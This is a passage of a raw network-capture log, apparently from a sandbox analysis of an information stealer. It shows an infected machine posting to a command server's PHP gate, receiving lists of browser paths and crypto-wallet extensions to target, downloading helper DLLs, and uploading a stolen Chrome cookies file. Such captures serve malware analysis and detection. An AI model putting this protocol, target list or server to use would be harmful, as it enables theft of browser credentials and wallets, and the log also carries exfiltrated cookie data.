lciBEYXRhfGNocm9tZXwwfE1pY3Jvc29mdCBFZGdlfFxNaWNyb3NvZnRcRWRnZVxVc2VyIERhdGF8Y2hyb21lfG1zZWRnZS5leGV8MzYwIEJyb3dzZXJ8XDM2MEJyb3dzZXJcQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfDB8UVFCcm93c2VyfFxUZW5jZW50XFFRQnJvd3Nl
Oct 1, 2024 16:49:58.726471901 CEST	512	IN	Data Raw: 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 68 79 62 32 31 6c 66 44 42 38 51 33 4a 35 63 48 52 76 56 47 46 69 66 46 78 44 63 6e 6c 77 64 47 39 55 59 57 49 67 51 6e 4a 76 64 33 4e 6c 63 6c 78 56 63 32 56 79 49 45 52 68 64 47 46 38 59 32 Data Ascii: clxVc2VyIERhdGF8Y2hyb21lfDB8Q3J5cHRvVGFifFxDcnlwdG9UYWIgQnJvd3NlclxVc2VyIERhdGF8Y2hyb21lfGJyb3dzZXIuZXhlfE9wZXJhIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE9wZXJhIEdYIFN0YWJsZXxcT3BlcmEgU29mdHdhcmV8b3BlcmF8b3BlcmEuZXhlfE1vemlsbGEgRml
Oct 1, 2024 16:49:58.728424072 CEST	468	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----DGDBKFBAKFBFHIECFBFI Host: 185.215.113.37 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 65 30 38 36 64 64 36 62 36 64 30 64 35 61 30 32 63 65 39 34 30 33 36 34 63 37 34 61 61 64 36 63 63 36 36 34 37 34 66 32 31 37 66 33 63 38 39 36 63 39 63 62 33 38 65 66 64 61 64 36 39 34 37 62 35 64 30 62 36 33 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 4b 46 42 41 4b 46 42 46 48 49 45 43 46 42 46 49 2d 2d 0d 0a Data Ascii: ------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="token"33e086dd6b6d0d5a02ce940364c74aad6cc66474f217f3c896c9cb38efdad6947b5d0b63------DGDBKFBAKFBFHIECFBFIContent-Disposition: form-data; name="message"plugins------DGDBKFBAKFBFHIECFBFI--
Oct 1, 2024 16:49:58.949500084 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 14:49:58 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 7116 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 5a 47 70 6a 62 47 4e 72 61 32 64 73 5a 57 4e 6f 62 32 39 69 62 47 35 6e 5a 32 68 6b 61 57 35 74 5a 57 56 74 61 32 4a 6e 59 32 6c 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 5a 57 70 69 59 57 78 69 59 57 74 76 63 47 78 6a 61 47 78 6e 61 47 56 6a 5a 47 46 73 62 57 56 6c 5a 57 46 71 62 6d 6c 74 61 47 31 38 4d 58 77 77 66 44 42 38 54 57 56 30 59 55 31 68 63 32 74 38 62 6d 74 69 61 57 68 6d 59 6d 56 76 5a 32 46 6c 59 57 39 6c 61 47 78 6c 5a 6d 35 72 62 32 52 69 5a 57 5a 6e 63 47 64 72 62 6d 35 38 4d 58 77 77 66 44 42 38 56 48 4a 76 62 6b 78 70 62 6d 74 38 61 57 4a 75 5a 57 70 6b 5a 6d 70 74 62 57 74 77 59 32 35 73 63 47 56 69 61 32 78 74 62 6d 74 76 5a 57 39 70 61 47 39 6d 5a 57 4e 38 4d 58 77 77 66 44 42 38 51 6d 6c 75 59 57 35 6a 5a 53 42 58 59 57 78 73 5a 58 52 38 5a 6d 68 69 62 32 68 70 62 57 46 6c 62 47 4a 76 61 48 42 71 59 6d 4a 73 5a 47 4e 75 5a 32 4e 75 59 58 42 75 5a 47 39 6b 61 6e 42 38 4d 58 77 77 66 44 42 38 57 57 39 79 62 32 6c 38 5a 6d [TRUNCATED] Data Ascii: TWV0YU1hc2t8ZGpjbGNra2dsZWNob29ibG5nZ2hkaW5tZWVta2JnY2l8MXwwfDB8TWV0YU1hc2t8ZWpiYWxiYWtvcGxjaGxnaGVjZGFsbWVlZWFqbmltaG18MXwwfDB8TWV0YU1hc2t8bmtiaWhmYmVvZ2FlYW9laGxlZm5rb2RiZWZncGdrbm58MXwwfDB8VHJvbkxpbmt8aWJuZWpkZmptbWtwY25scGVia2xtbmtvZW9paG9mZWN8MXwwfDB8QmluYW5jZSBXYWxsZXR8Zmhib2hpbWFlbGJvaHBqYmJsZGNuZ2NuYXBuZG9kanB8MXwwfDB8WW9yb2l8ZmZuYmVsZmRvZWlvaGVua2ppYm5tYWRqaWVoamhhamJ8MXwwfDB8Q29pbmJhc2UgV2FsbGV0IGV4dGVuc2lvbnxobmZhbmtub2NmZW9mYmRkZ2Npam5taG5mbmtkbmFhZHwxfDB8MXxHdWFyZGF8aHBnbGZoZ2ZuaGJncGpkZW5qZ21kZ29laWFwcGFmbG58MXwwfDB8SmF4eCBMaWJlcnR5fGNqZWxmcGxwbGViZGpqZW5sbHBqY2JsbWprZmNmZm5lfDF8MHwwfGlXYWxsZXR8a25jY2hkaWdvYmdoZW5iYmFkZG9qam5uYW9nZnBwZmp8MXwwfDB8TUVXIENYfG5sYm1ubmlqY25sZWdrampwY2ZqY2xtY2ZnZ2ZlZmRtfDF8MHwwfEd1aWxkV2FsbGV0fG5hbmptZGtuaGtpbmlmbmtnZGNnZ2NmbmhkYWFtbW1qfDF8MHwwfFJvbmluIFdhbGxldHxmbmpobWtoaG1rYmpra2FibmRjbm5vZ2Fnb2dibmVlY3wxfDB8MHxOZW9MaW5lfGNwaGhsZ21nYW1lb2RuaGtqZG1rcGFubGVsbmxvaGFvfDF8MHwwfENMViBXYWxsZXR8bmhua2JrZ2ppa2djaWdhZG9ta3BoYWxhbm5kY2Fwamt8MXwwfDB8TGlxdWFsaXR5
Oct 1, 2024 16:49:58.949512005 CEST	1236	IN	Data Raw: 49 46 64 68 62 47 78 6c 64 48 78 72 63 47 5a 76 63 47 74 6c 62 47 31 68 63 47 4e 76 61 58 42 6c 62 57 5a 6c 62 6d 52 74 5a 47 4e 6e 61 47 35 6c 5a 32 6c 74 62 6e 77 78 66 44 42 38 4d 48 78 55 5a 58 4a 79 59 53 42 54 64 47 46 30 61 57 39 75 49 46 Data Ascii: IFdhbGxldHxrcGZvcGtlbG1hcGNvaXBlbWZlbmRtZGNnaG5lZ2ltbnwxfDB8MHxUZXJyYSBTdGF0aW9uIFdhbGxldHxhaWlmYm5iZm9icG1lZWtpcGhlZWlqaW1kcG5scGdwcHwxfDB8MHxLZXBscnxkbWthbWNrbm9na2djZGZoaGJkZGNnaGFjaGtlamVhcHwxfDB8MHxTb2xsZXR8ZmhtZmVuZGdkb2NtY2JtZmlrZGNvZ29
Oct 1, 2024 16:49:58.949522018 CEST	248	IN	Data Raw: 66 47 52 75 5a 32 31 73 59 6d 78 6a 62 32 52 6d 62 32 4a 77 5a 48 42 6c 59 32 46 68 5a 47 64 6d 59 6d 4e 6e 5a 32 5a 71 5a 6d 35 74 66 44 46 38 4d 48 77 77 66 45 74 6c 5a 58 42 6c 63 69 42 58 59 57 78 73 5a 58 52 38 62 48 42 70 62 47 4a 75 61 57 Data Ascii: fGRuZ21sYmxjb2Rmb2JwZHBlY2FhZGdmYmNnZ2ZqZm5tfDF8MHwwfEtlZXBlciBXYWxsZXR8bHBpbGJuaWlhYmFja2RqY2lvbmtvYmdsbWRkZmJjam98MXwwfDB8U29sZmxhcmUgV2FsbGV0fGJoaGhsYmVwZGtiYXBhZGpkbm5vamtiZ2lvaW9kYmljfDF8MHwwfEN5YW5vIFdhbGxldHxka2RlZGxwZ2RtbWtrZmphYmZmZWd
Oct 1, 2024 16:49:58.949625969 CEST	1236	IN	Data Raw: 59 57 31 6d 61 32 78 72 62 58 77 78 66 44 42 38 4d 48 78 4c 53 45 4e 38 61 47 4e 6d 62 48 42 70 62 6d 4e 77 63 48 42 6b 59 32 78 70 62 6d 56 68 62 47 31 68 62 6d 52 70 61 6d 4e 74 62 6d 74 69 5a 32 35 38 4d 58 77 77 66 44 42 38 56 47 56 36 51 6d Data Ascii: YW1ma2xrbXwxfDB8MHxLSEN8aGNmbHBpbmNwcHBkY2xpbmVhbG1hbmRpamNtbmtiZ258MXwwfDB8VGV6Qm94fG1uZmlmZWZrYWpnb2ZrY2prZW1pZGlhZWNvY25ramVofDF8MHwwfFRlbXBsZXxvb2tqbGJraWlqaW5ocG1uamZmY29mam9uYmZiZ2FvY3wxfDB8MHxHb2J5fGpua2VsZmFuamtlYWRvbmVjYWJlaGFsbWJncGZ
Oct 1, 2024 16:49:58.949644089 CEST	1236	IN	Data Raw: 62 6d 46 6e 59 32 5a 69 63 47 6c 6c 62 57 35 72 5a 48 42 76 62 57 4e 6a 62 6d 70 69 62 47 31 71 66 44 46 38 4d 48 77 77 66 45 78 6c 59 58 41 67 56 47 56 79 63 6d 45 67 56 32 46 73 62 47 56 30 66 47 46 70 61 6d 4e 69 5a 57 52 76 61 57 70 74 5a 32 Data Ascii: bmFnY2ZicGllbW5rZHBvbWNjbmpibG1qfDF8MHwwfExlYXAgVGVycmEgV2FsbGV0fGFpamNiZWRvaWptZ25sbWplZWdqYWdsbWVwYm1wa3BpfDF8MHwwfFRyZXpvciBQYXNzd29yZCBNYW5hZ2VyfGltbG9pZmtnamFnZ2hubmNqa2hnZ2RoYWxtY25ma2xrfDF8MHwwfEF1dGhlbnRpY2F0b3J8YmhnaG9hbWFwY2RwYm9ocGh
Oct 1, 2024 16:49:58.949656010 CEST	448	IN	Data Raw: 59 32 4e 70 62 6d 68 68 63 47 52 69 66 44 46 38 4d 48 77 77 66 45 39 77 5a 58 4a 68 49 46 64 68 62 47 78 6c 64 48 78 6e 62 32 70 6f 59 32 52 6e 59 33 42 69 63 47 5a 70 5a 32 4e 68 5a 57 70 77 5a 6d 68 6d 5a 57 64 6c 61 32 52 6e 61 57 4a 73 61 33 Data Ascii: Y2NpbmhhcGRifDF8MHwwfE9wZXJhIFdhbGxldHxnb2poY2RnY3BicGZpZ2NhZWpwZmhmZWdla2RnaWJsa3wwfDB8MXxUcnVzdCBXYWxsZXR8ZWdqaWRqYnBnbGljaGRjb25kYmNiZG5iZWVwcGdkcGh8MXwwfDB8UmlzZSAtIEFwdG9zIFdhbGxldHxoYmJnYmVwaGdvamlrYWpoZmJvbWhsbW1vbGxwaGNhZHwxfDB8MHxSYWl
Oct 1, 2024 16:49:58.949922085 CEST	1236	IN	Data Raw: 4d 48 78 44 62 32 6c 75 61 48 56 69 66 47 70 6e 59 57 46 70 62 57 46 71 61 58 42 69 63 47 52 76 5a 33 42 6b 5a 32 78 6f 59 58 42 6f 62 47 52 68 61 32 6c 72 5a 32 56 6d 66 44 46 38 4d 48 77 77 66 45 31 31 62 48 52 70 64 6d 56 79 63 31 67 67 52 47 Data Ascii: MHxDb2luaHVifGpnYWFpbWFqaXBicGRvZ3BkZ2xoYXBobGRha2lrZ2VmfDF8MHwwfE11bHRpdmVyc1ggRGVGaSBXYWxsZXR8ZG5nbWxibGNvZGZvYnBkcGVjYWFkZ2ZiY2dnZmpmbm18MXwwfDB8RnJvbnRpZXIgV2FsbGV0fGtwcGZkaWlwcGhmY2NlbWNpZ25oaWZwamthcGZiaWhkfDF8MHwwfFNhZmVQYWx8bGdtcGNwZ2x
Oct 1, 2024 16:49:58.950078964 CEST	468	IN	Data Raw: 61 57 6c 71 5a 57 52 75 5a 33 42 73 5a 6d 70 74 62 6d 39 76 63 48 42 69 59 32 78 72 61 33 77 78 66 44 42 38 4d 48 78 50 63 47 56 75 54 57 46 7a 61 79 42 58 59 57 78 73 5a 58 52 38 63 47 56 75 61 6d 78 6b 5a 47 70 72 61 6d 64 77 62 6d 74 73 62 47 Data Ascii: aWlqZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8cGVuamxkZGpramdwbmtsbGJvY2NkZ2NjZWtwa2NiaW58MXwwfDB8U2FmZVBhbCBXYWxsZXR8YXBlbmtmYmJwbWhpaGVobWlobmRtbWNkYW5hY29sbmh8MXwwfDB8Qml0Z2V0IFdhbGxldHxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3B
Oct 1, 2024 16:49:58.952014923 CEST	469	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----AEHDAKFIJJKKEBGDBAAK Host: 185.215.113.37 Content-Length: 268 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 41 45 48 44 41 4b 46 49 4a 4a 4b 4b 45 42 47 44 42 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 65 30 38 36 64 64 36 62 36 64 30 64 35 61 30 32 63 65 39 34 30 33 36 34 63 37 34 61 61 64 36 63 63 36 36 34 37 34 66 32 31 37 66 33 63 38 39 36 63 39 63 62 33 38 65 66 64 61 64 36 39 34 37 62 35 64 30 62 36 33 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 44 41 4b 46 49 4a 4a 4b 4b 45 42 47 44 42 41 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 70 6c 75 67 69 6e 73 0d 0a 2d 2d 2d 2d 2d 2d 41 45 48 44 41 4b 46 49 4a 4a 4b 4b 45 42 47 44 42 41 41 4b 2d 2d 0d 0a Data Ascii: ------AEHDAKFIJJKKEBGDBAAKContent-Disposition: form-data; name="token"33e086dd6b6d0d5a02ce940364c74aad6cc66474f217f3c896c9cb38efdad6947b5d0b63------AEHDAKFIJJKKEBGDBAAKContent-Disposition: form-data; name="message"fplugins------AEHDAKFIJJKKEBGDBAAK--
Oct 1, 2024 16:49:59.186431885 CEST	335	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 14:49:59 GMT Server: Apache/2.4.52 (Ubuntu) Vary: Accept-Encoding Content-Length: 108 Keep-Alive: timeout=5, max=96 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 54 57 56 30 59 55 31 68 63 32 74 38 4d 48 78 33 5a 57 4a 6c 65 48 52 6c 62 6e 4e 70 62 32 35 41 62 57 56 30 59 57 31 68 63 32 73 75 61 57 39 38 55 6d 39 75 61 57 34 67 56 32 46 73 62 47 56 30 66 44 42 38 63 6d 39 75 61 57 34 74 64 32 46 73 62 47 56 30 51 47 46 34 61 57 56 70 62 6d 5a 70 62 6d 6c 30 65 53 35 6a 62 32 31 38 Data Ascii: TWV0YU1hc2t8MHx3ZWJleHRlbnNpb25AbWV0YW1hc2suaW98Um9uaW4gV2FsbGV0fDB8cm9uaW4td2FsbGV0QGF4aWVpbmZpbml0eS5jb218
Oct 1, 2024 16:49:59.204948902 CEST	202	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDG Host: 185.215.113.37 Content-Length: 6159 Connection: Keep-Alive Cache-Control: no-cache
Oct 1, 2024 16:49:59.204993010 CEST	6159	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 65 30 38 36 Data Ascii: ------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="token"33e086dd6b6d0d5a02ce940364c74aad6cc66474f217f3c896c9cb38efdad6947b5d0b63------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="file_name"c3lzdGVtX2luZ
Oct 1, 2024 16:50:00.059472084 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 14:49:59 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=95 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 1, 2024 16:50:00.074737072 CEST	93	OUT	GET /0d60be0de163924d/sqlite3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 1, 2024 16:50:00.292946100 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 14:50:00 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 11:30:30 GMT ETag: "10e436-5e7ec6832a180" Accept-Ranges: bytes Content-Length: 1106998 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 d7 dd 15 63 00 92 0e 00 bf 13 00 00 e0 00 06 21 0b 01 02 19 00 26 0b 00 00 16 0d 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 40 0b 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 30 0f 00 00 06 00 00 1c 3a 11 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 d0 0c 00 88 2a 00 00 00 00 0d 00 d0 0c 00 00 00 30 0d 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 0d 00 18 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 20 0d 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELc!&@a0: 0@< .text%&`P`.data\|'@(,@`.rdatapDpFT@`@.bss(`.edata,@0@.idata@0.CRT,@0.tls @0.rsrc0@0.reloc<@>@0B/48@@B/19R"@B/31]'`(@B/45-.@B/57\B@0B/70
Oct 1, 2024 16:50:00.292969942 CEST	1236	IN	Data Raw: 00 00 23 03 00 00 00 d0 0e 00 00 04 00 00 00 4e 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 38 31 00 00 00 00 00 73 3a 00 00 00 e0 0e 00 00 3c 00 00 00 52 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 39 32 00 00 00 00 00 Data Ascii: #N@B/81s:<R@B/92P @B
Oct 1, 2024 16:50:01.390871048 CEST	952	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HIIIDAKKJJJKKECAKKJE Host: 185.215.113.37 Content-Length: 751 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 65 30 38 36 64 64 36 62 36 64 30 64 35 61 30 32 63 65 39 34 30 33 36 34 63 37 34 61 61 64 36 63 63 36 36 34 37 34 66 32 31 37 66 33 63 38 39 36 63 39 63 62 33 38 65 66 64 61 64 36 39 34 37 62 35 64 30 62 36 33 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 59 32 39 76 61 32 6c 6c 63 31 78 48 62 32 39 6e 62 47 55 67 51 32 68 79 62 32 31 6c 58 30 52 6c 5a 6d 46 31 62 48 51 75 64 48 68 30 0d 0a 2d 2d 2d 2d 2d 2d 48 49 49 49 44 41 4b 4b 4a 4a 4a 4b 4b 45 43 41 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 [TRUNCATED] Data Ascii: ------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="token"33e086dd6b6d0d5a02ce940364c74aad6cc66474f217f3c896c9cb38efdad6947b5d0b63------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="file_name"Y29va2llc1xHb29nbGUgQ2hyb21lX0RlZmF1bHQudHh0------HIIIDAKKJJJKKECAKKJEContent-Disposition: form-data; name="file"Lmdvb2dsZS5jb20JVFJVRQkvCUZBTFNFCTE2OTkwMTE2MTUJMVBfSkFSCTIwMjMtMTAtMDQtMTMKLmdvb2dsZS5jb20JRkFMU0UJLwlGQUxTRQkxNzEyMjMwODE1CU5JRAk1MTE9RWY1dlBGR3ctTVpZbzVod2UtMFRoQVZzbGJ4Ym12ZFZad2NIbnFWeldIQVUxNHY1M01OMVZ2d3ZRcThiYVlmZzItSUF0cVpCVjVOT0w1cnZqMk5XSXFyejM3N1VoTGRIdE9nRS10SmFCbFVCWUpFaHVHc1FkcW5pM29USmcwYnJxdjFkamRpTEp5dlRTVWhkSy1jNUpXYWRDU3NVTFBMemhTeC1GLTZ3T2c0Cg==------HIIIDAKKJJJKKECAKKJE--
Oct 1, 2024 16:50:02.112086058 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 14:50:01 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=93 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 1, 2024 16:50:02.200392008 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JKFIDGDHJEGIEBFHDGDG Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 65 30 38 36 64 64 36 62 36 64 30 64 35 61 30 32 63 65 39 34 30 33 36 34 63 37 34 61 61 64 36 63 63 36 36 34 37 34 66 32 31 37 66 33 63 38 39 36 63 39 63 62 33 38 65 66 64 61 64 36 39 34 37 62 35 64 30 62 36 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 46 49 44 47 44 48 4a 45 47 49 45 42 46 48 44 47 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="token"33e086dd6b6d0d5a02ce940364c74aad6cc66474f217f3c896c9cb38efdad6947b5d0b63------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------JKFIDGDHJEGIEBFHDGDGContent-Disposition: form-data; name="file"------JKFIDGDHJEGIEBFHDGDG--
Oct 1, 2024 16:50:02.926498890 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 14:50:02 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=92 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 1, 2024 16:50:03.891855955 CEST	564	OUT	POST /e2b1563c6670f193.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----KFIJJEGHDAEBGCAKJKFH Host: 185.215.113.37 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 33 65 30 38 36 64 64 36 62 36 64 30 64 35 61 30 32 63 65 39 34 30 33 36 34 63 37 34 61 61 64 36 63 63 36 36 34 37 34 66 32 31 37 66 33 63 38 39 36 63 39 63 62 33 38 65 66 64 61 64 36 39 34 37 62 35 64 30 62 36 33 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 4b 46 49 4a 4a 45 47 48 44 41 45 42 47 43 41 4b 4a 4b 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------KFIJJEGHDAEBGCAKJKFHContent-Disposition: form-data; name="token"33e086dd6b6d0d5a02ce940364c74aad6cc66474f217f3c896c9cb38efdad6947b5d0b63------KFIJJEGHDAEBGCAKJKFHContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------KFIJJEGHDAEBGCAKJKFHContent-Disposition: form-data; name="file"------KFIJJEGHDAEBGCAKJKFH--
Oct 1, 2024 16:50:04.603667974 CEST	202	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 14:50:04 GMT Server: Apache/2.4.52 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=91 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Oct 1, 2024 16:50:05.009773970 CEST	93	OUT	GET /0d60be0de163924d/freebl3.dll HTTP/1.1 Host: 185.215.113.37 Cache-Control: no-cache
Oct 1, 2024 16:50:05.228890896 CEST	1236	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 14:50:05 GMT Server: Apache/2.4.52 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 